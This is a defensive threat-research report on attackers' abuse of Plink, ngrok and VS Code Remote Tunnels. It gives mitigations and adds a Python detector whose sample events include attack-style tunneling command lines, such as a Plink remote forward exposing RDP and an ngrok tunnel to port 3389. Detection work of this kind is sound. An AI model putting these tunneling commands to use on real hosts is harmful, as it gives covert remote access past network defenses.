June 25, 2024
Key Points
Protocol tunneling is a technique used to encapsulate one network protocol within another, allowing data to be transmitted through a secure or otherwise-allowed protocol. There are many legitimate use cases for protocol tunneling in enterprise environments. Tunneling protocols provide encryption and secure channels for data transmission, protecting sensitive information from unauthorized access. They also allow users to easily access remote resources and services to test, manage, and troubleshoot applications and systems.
On the other hand, threat actors often use this method to bypass network defenses and maintain covert command-and-control (C2) channels after compromising hosts within an environment. By encapsulating malicious traffic within commonly permitted protocols such as HTTP, Domain Name System (DNS), or SSH, attackers can evade firewalls, intrusion detection systems (IDS), and other security measures that might otherwise detect and block their activities. If these communication channels are not detected and remediated following an intrusion, the threat actor is never fully removed from the environment and can continue the attack.
The primary motivations for using protocol tunneling include evading security controls, blending malicious traffic with legitimate network traffic to avoid detection, maintaining persistent access to compromised systems, and enabling the covert exfiltration of sensitive data. The technique is often accomplished using legitimate tools designed for secure remote access and development purposes that are repurposed for malicious activities. Tools such as Plink and ngrok offer a simple way to establish tunnels; we have observed cybercriminals use these tools for intrusion in multiple ransomware and extortion attacks over the past few years. Additionally, ReliaQuest recently investigated a customer incident involving the use of a newer tunneling feature in Visual Studio Code (VS Code), a source code editor from Microsoft. This report—the first in a series on protocol tunneling—outlines why threat actors use protocol tunneling, explores common tools used to tunnel network traffic, and provides actionable recommendations to prevent the malicious use of these tools. Subsequent reports in this series will delve deeper into hunting for the presence of specific tools within networks.
Below are some of the ways and reasons that threat actors leverage tunneling protocols to bypass security controls and monitoring systems.
Bypassing Network Controls
Maintaining Stealth
Persistent Access
Data Exfiltration
Adding to the stealthy nature of this technique, tunneling can often be accomplished with tools designed for legitimate purposes such as secure remote access or code development and testing. While some threat actors use custom malware for tunneling traffic, other adversaries choose legitimate tools that camouflage their traffic as administrator activity, preventing detection. Below, we provide an overview of three commonly used tunneling protocol tools: Plink, ngrok, and VS Code.
Plink, a command-line interface (CLI) to the PuTTY backend, is a versatile tool designed for legitimate purposes such as secure remote access. Attackers can exploit its capabilities to establish covert communication channels and maintain control over compromised systems. By using Plink, threat actors can encapsulate other types of traffic within encrypted SSH tunnels, helping them bypass security controls.
How Threat Actors Use Plink
SSH tunnels using Plink are typically established through port forwarding, a technique that redirects network traffic from one port to another so that hosts in different network segments can communicate over an encrypted channel. Attackers abuse this functionality by using Plink to establish both local and remote port forwarding.
Local port forwarding and remote port forwarding are two methods used to redirect network traffic through an encrypted SSH tunnel, but they serve different purposes. Local port forwarding redirects traffic from a local port on the attacker’s machine to a specified destination on the target server. This is commonly used to access local services running on the target SSH server, or services running on other hosts in the same network segment.
In contrast, remote port forwarding redirects traffic from a port on a remote attacker-controlled server to a specified service on the client machine. This is the most common method we see attackers use, since it can be used to expose a local service on an internal machine to the outside world via the remote attacker server. For example, an attacker can set up remote port forwarding to forward traffic on their server to the RDP service on the target compromised machine. This can allow an attacker to RDP to an internal host behind a firewall that does not allow inbound RDP.
We have seen more than 200 mentions on dark web platforms of using Plink for port forwarding and to tunnel protocols like RDP. In one such post, for example, a forum user provided a tutorial on how to use “the Netcat shell and plink.exe” to “set up remote port forwarding from the victim’s system to my machine” to access remote desktop for a host behind a firewall in an internal network (quotations translated from Russian). They shared detailed steps and example commands to set up port forwarding to access the RDP service.
Mitigations
To perform port forwarding with Plink, the host must establish an outbound SSH connection. Create network policies on protocol-aware firewall devices to block outbound SSH traffic from devices that do not need to communicate with external hosts over SSH. Additionally, implement Group Policy Objects (GPOs) for Software Restriction Policies (SRP) in Active Directory (AD) to prevent the execution of Plink enterprise-wide if the tool is not legitimately used. Exceptions should be made for administrators and devices that require its use.
ngrok is a popular tool designed to create secure tunnels from a public endpoint to a local service, often used by developers to expose local servers to the internet for testing and development purposes. It works by providing a unique, publicly accessible URL that forwards traffic to a specified port on the local machine. While ngrok has many legitimate uses, attackers exploit its capabilities to bypass network controls and establish covert communication channels. The notorious cybercrime group “Scattered Spider” has used ngrok to establish persistent access in many intrusions, including an incident observed by ReliaQuest in November 2023.
How Threat Actors Use ngrok
By encapsulating traffic within commonly allowed protocols such as HTTP and HTTPS, ngrok can evade firewalls and intrusion detection systems that might otherwise block direct connections. Attackers use ngrok to quickly and easily create temporary, dynamic URLs that are difficult to track and block, allowing them to maintain remote control over compromised systems, exfiltrate data, and execute commands without raising alarms.
Similar to SSH tunneling, ngrok can make services on internal machines accessible through a firewall. The difference is that ngrok tunnels traffic through HTTP and HTTPS. Additionally, traffic is tunneled through ngrok’s global network of servers and accessed via dynamic URLs, removing the need for attackers to administer their own proxy. This can also make traffic harder to detect, especially if ngrok is used legitimately in an environment.
We have observed users on dark web forums suggest the use of ngrok to other users who are looking for a way to get remote access to internal services on a compromised host behind a firewall. One user, for instance, was seeking “a socks4 proxy type for connect to a local network with other devices.” The ReliaQuest Threat Research team has identified more than 400 posts on dark web platforms related to using ngrok to tunnel traffic for remote access. Additionally, some remote-access trojans (RATs), such as XWorm and Anarchy Panel RAT, are advertised as having built-in capabilities to install ngrok, indicating it is a popular tool for facilitating remote access.
While ngrok can be used for various purposes, we most often see it used to access RDP and gain remote access on compromised hosts. By installing ngrok on a compromised host and configuring it for RDP port 3389, an attacker can establish a remote session on internal clients within a network. Alternatively, ngrok might be used to tunnel access for a Virtual Network Computing (VNC) connection—a graphical desktop-sharing technology that uses the Remote Frame Buffer protocol to provide RDP-like control over another computer. Threat actors may choose to install a VNC server on a compromised host and then use ngrok to make that server accessible, granting them remote access.
ngrok uses a network of servers that relay traffic to the upstream service running on the client. Create network policies in the environment to block traffic to the following domains.
Additionally, implement GPOs for SRP in AD to prevent the execution of ngrok. Create exceptions for these network and host controls to allow hosts or users that use the software to serve a legitimate business function.
VS Code has become a cornerstone in the modern developer’s toolkit, celebrated for its versatility and broad extension library. Many enterprises and consumers alike have relied on its convenience. One of these conveniences can be found in VS Code’s tunneling ability, Remote Tunnels. VS Code Remote Tunnels is a feature crafted to elevate the remote development experience by enabling secure and seamless connections to remote machines via Microsoft dev tunnels, essentially integrating local and remote workflows. While primarily aimed at legitimate use cases such as remote debugging, code navigation, and collaborative development, Remote Tunnels can be leveraged by malicious actors to establish covert communication channels and maintain persistent access to compromised systems.
How Threat Actors Use VS Code Remote Tunnels
Leveraging the VS Code CLI, attackers can initiate tunnels authenticated through GitHub, effectively bypassing traditional security defenses due to the signed and trusted nature of the VS Code binary. This tunnel establishes an encrypted connection over HTTPS and essentially provides reverse shell access to an internal host. With this access, an attacker can execute commands, navigate the file system, and even exfiltrate data from the remote machine with minimal detection risk. The legitimate appearance of the VS Code binary enables it to evade detection mechanisms that would normally catch malicious tunnel abuse, such as static detections, antivirus software, or EDR.
Moreover, the tunneled traffic is routed through Microsoft’s domains, such as visualstudio.com, blending seamlessly with legitimate traffic and complicating the detection of malicious activities. Attackers can exploit this feature to establish a reverse shell, granting them extensive control over the target system without raising immediate alarms. While VS Code Remote Tunnels is currently not as prevalent a tool as Plink and ngrok, and we have not yet seen its use mentioned on criminal forums, ReliaQuest has observed malicious VS Code tunneling for remote shell access in a recent incident. Given the trusted nature of the software, it is likely that use of this technique will increase in the future.
Similar to ngrok, VS Code Remote Tunnels uses cloud-hosted servers to relay traffic to the client machine. Create network policies in the environment to block traffic to the following domains.
Additionally, GPOs can be configured to control access to Dev Tunnels, including the ability to disable the service. Refer to documentation from Microsoft to create policies that disable Dev Tunnels on Windows hosts in the environment. Create exceptions for these network and host controls to allow hosts or users that use the feature for a legitimate business function.
Protocol tunneling has proven to be an effective technique used by threat actors to secure remote access to internal network clients. We predict, with high confidence, that the use of protocol tunneling tools will not decrease in the long term. Tools like ngrok and Plink have been used by threat actors for years and offer an easily deployable means to evade detection and establish persistent access to compromised systems. The growing adoption of encrypted traffic and the ubiquitous use of cloud services also provide a fertile ground for these tools to operate undetected. Additionally, the relatively new tunnel feature in VS Code offers arguably an even stealthier way to establish remote access. Because the software benefits from the trusted nature of Microsoft products, it is likely that its abuse will become more popular among threat actors.
To identify suspicious tunneling, ReliaQuest offers detection rules that alert defenders to activity related to protocol tunneling. To remediate suspicious activity, associated GreyMatter Respond Plays can be executed by ReliaQuest customers or by the ReliaQuest team on a customer’s behalf.
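The following is an added example written for this article, not one of ReliaQuest's detection rules: it applies the Plink -L/-R/-D port-forwarding syntax explained in the Plink section and the ngrok and VS Code CLI invocations described above to process-creation telemetry reduced to image path and command line. The events, paths and hostnames are constructed, and matching is by image name only, so it should be paired with file-hash or code-signer checks in production.

```python
"""Flag tunneling-tool command lines in process-creation events (added example,
not ReliaQuest's detection rules). Plink's forwards follow OpenSSH syntax:
-L [bind:]port:host:hostport (local), -R [bind:]port:host:hostport (remote,
the service on the client is exposed on the SSH server), -D port (SOCKS)."""
import shlex
from typing import Optional

# Constructed sample events, not real telemetry; shape mirrors Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\bob\AppData\Local\Temp\plink.exe",
     "cmdline": "plink.exe -ssh -P 443 -N -R 0.0.0.0:9001:127.0.0.1:3389 u@203.0.113.10"},
    {"image": r"C:\Tools\plink.exe",
     "cmdline": "plink.exe -ssh -L 8080:intranet.corp:80 admin@jumphost"},
    {"image": r"C:\ProgramData\ngrok.exe",
     "cmdline": "ngrok.exe tcp 3389 --authtoken REDACTED"},
    {"image": r"C:\Program Files\Microsoft VS Code\bin\code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms --name wks-07"},
    {"image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": r"Code.exe --new-window C:\src\app"},
]
# Ports whose exposure through a tunnel usually means interactive remote access.
REMOTE_ACCESS_PORTS = {3389: "RDP", 5900: "VNC", 22: "SSH", 445: "SMB"}

def parse_forward(spec: str) -> tuple[str, int]:
    """(destination host, destination port) from a -L/-R spec; the optional
    bind address and the listening port in front are ignored."""
    parts = spec.split(":")
    return parts[-2], int(parts[-1])

def classify(event: dict) -> Optional[str]:
    """Describe the tunnel a command line would build, or None if it looks benign.
    Matches on image name only: a renamed binary needs hash or signer checks."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    argv = shlex.split(event["cmdline"], posix=False)
    if exe == "plink.exe":
        for i, tok in enumerate(argv):
            if tok in ("-R", "-L") and i + 1 < len(argv):
                host, port = parse_forward(argv[i + 1])
                kind = "remote" if tok == "-R" else "local"
                svc = REMOTE_ACCESS_PORTS.get(port, "other")
                return f"plink {kind} forward to {host}:{port} [{svc}]"
            if tok == "-D":
                return "plink dynamic SOCKS forward"
        return "plink executed without forwarding flags"
    if exe == "ngrok.exe" and len(argv) > 2 and argv[1] in ("tcp", "http", "tls"):
        svc = REMOTE_ACCESS_PORTS.get(int(argv[2]) if argv[2].isdigit() else 0, "other")
        return f"ngrok {argv[1]} tunnel to local port {argv[2]} [{svc}]"
    if exe == "code.exe" and "tunnel" in argv[1:]:
        return "VS Code CLI remote tunnel (Dev Tunnels)"
    return None

def scan(events: list[dict]) -> list[tuple[str, str]]:
    """Run classify() over events and keep only the hits."""
    return [(e["image"], f) for e in events if (f := classify(e))]
```

Running `scan(SAMPLE_EVENTS)` flags the first four events and leaves the ordinary VS Code launch alone; the remote forward to 127.0.0.1:3389 is the RDP-exposure pattern the Plink section describes.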
The ReliaQuest Threat Research team offers the following non-exhaustive list of recommendations and best practices to establish a secure foundation against the threats and tactics, techniques, and procedures (TTPs) mentioned in this report.